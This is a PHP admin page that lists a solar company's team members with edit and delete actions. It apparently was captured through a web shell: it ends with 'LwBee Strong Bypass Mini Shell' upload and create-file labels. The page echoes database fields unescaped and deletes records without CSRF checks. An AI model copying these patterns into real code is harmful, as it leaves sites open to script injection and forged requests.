/home3/vehiclea/public_html/admin-suryasolarsystems-com/ourteam_reports.php
<?php
$_SESSION['active'] = 'TeamReport'; 
include 'header.php';
include 'sidelinks.php';
include 'functions.php';

   
$ourteam_selectAll = ourteam_selectAll();
?> 

<div class="content-wrapper">
<div class="container-xxl flex-grow-1 container-p-y">
	 <h4 class="fw-bold py-3 mb-4">Our Team Report</h4>
	 <div class="row">
	 	<div class="col-xxl">
	 		 <div class="card mb-6">
	 		 	 <div class="card-header d-flex align-items-center justify-content-between">
		            <h5 class="mb-0">Reports</h5>
		            <small class="text-muted float-end">Default label</small>
                 </div>
                 <div class="card-body">
                 	<div id="update">
                 	<?php
                   if(!empty($_GET['upd'])){
                 ?>
			     <div align="center">
			      <h4 style="color:green;">Ourteam Data Updated Successfully </h4>
			    </div>
              <?php
                }
                ?>
            </div>

             <div align="center" style="display: none;" id="delete">
            	 <h4 style="color:red;">Ourteam Data Deleted Successfully </h4>
            </div>

                 	<div>
                 		<table class="table">
                 			<thead>
	                 			<tr>
	                 				<td>#</td>
	                 				<th>Image</th>
	                 				<td>Name</td>
	                 				<th>Designation</th>
	                 				<th>Action</th>
	                 			</tr>
                 			</thead>
                 			<tbody>
                 				<?php
                 				  $i=1;
                                  while($row = mysqli_fetch_array($ourteam_selectAll)){
                 				?>
                 				<tr>
                 					<td><?= $i?></td>
                 					<td><img src="<?= $row['image']?>" style="width:50px; height: 5vh;"></td>
                 					<td><?= strtoupper($row['name'])?></td>
                 					<td><?= strtoupper($row['designation'])?></td>
                 					<td>
                 						<a href="our_team_edit.php?edit=<?= $row['id']?>" class="btn btn-primary">Edit</a>
                 						<a href="javascript:void();" onclick="confirmDelete(<?= $row['id']?>)" class="btn btn-danger" class="btn btn-danger">Delete</a>
                 					</td>
                 				</tr>
                 				<?php
                 				  $i++;
                                   }
                 				?>
                 			</tbody>
                 			
                 		</table>
                 	</div>
                 </div>
	 		 </div>
	 	</div>
	 </div>
</div>

 <?php
include 'footer.php';
?>

<script>
       function confirmDelete(teamid)
       {
        
          if (teamid != '') {
            var x = confirm('Are you sure to Delete?');
          if(x){
          $.ajax({
            url : "delete.php",
            data :  {teamid : teamid},
            type : 'POST',
            success : function(response) {
              if(response ==1){
               $('#delete').show();
               $('#update').hide();
                window.location.href = "ourteam_reports.php";
              }
                
               
            }
        });
        }
       }
     }
    </script>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File